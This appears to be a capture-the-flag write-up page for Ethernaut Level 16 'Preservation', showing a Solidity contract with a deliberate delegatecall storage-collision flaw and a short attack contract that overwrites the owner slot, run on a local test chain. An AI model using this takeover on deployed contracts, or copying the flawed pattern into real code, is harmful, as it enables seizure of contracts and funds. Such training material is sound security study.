eridian.xyzx.comGitHub
Edit

Level 16 - Preservation ⏺⏺⏺⏺

LogoThe EthernautOpenZeppelin

Level Setup

This contract utilizes a library to store two different times for two different timezones. The constructor creates two instances of the library for each time to be stored.

The goal of this level is for you to claim ownership of the instance you are given.

Things that might help

  • Look into Solidity's documentation on the delegatecall low level function, how it works, how it can be used to delegate operations to on-chain. libraries, and what implications it has on execution scope.

  • Understanding what it means for delegatecall to be context-preserving.

  • Understanding how storage variables are stored and accessed.

  • Understanding how casting works between different data types.

Level Contract

Logoethernaut/contracts/src/levels/Preservation.sol at a89c8f7832258655c09fde16e6602c78e5e99dbd · OpenZeppelin/ethernautGitHub
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Preservation {
    // public library contracts
    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;
    uint256 storedTime;
    // Sets the function signature for delegatecall
    bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

    constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) {
        timeZone1Library = _timeZone1LibraryAddress;
        timeZone2Library = _timeZone2LibraryAddress;
        owner = msg.sender;
    }

    // set the time for timezone 1
    function setFirstTime(uint256 _timeStamp) public {
        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }

    // set the time for timezone 2
    function setSecondTime(uint256 _timeStamp) public {
        timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }
}

// Simple library contract to set the time
contract LibraryContract {
    // stores a timestamp
    uint256 storedTime;

    function setTime(uint256 _time) public {
        storedTime = _time;
    }
}

Exploit

make anvil-exploit-level-16

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>
Logoethernaut-foundry/src/Level16.sol at 597859bfacb216c601efbdc60b0546fad51b37cb · EridianAlpha/ethernaut-foundryGitHub
src/Level16.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";

// ================================================================
// │                     LEVEL 16 - PRESERVATION                  │
// ================================================================
contract AttackContract {
    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;

    function setTime(uint256 /* _time */ ) public {
        owner = msg.sender;
    }
}

Submit instance... 🥳

Completion Message

As the previous level, delegate mentions, the use of delegatecall to call libraries can be risky. This is particularly true for contract libraries that have their own state. This example demonstrates why the library keyword should be used for building libraries, as it prevents the libraries from storing and accessing state variables.

Notes

Logoethernaut-openzeppelin-hacks/level_16_Preservation.md at e936301859334383d568a614084917100319205e · nvnx7/ethernaut-openzeppelin-hacksGitHub

Last updated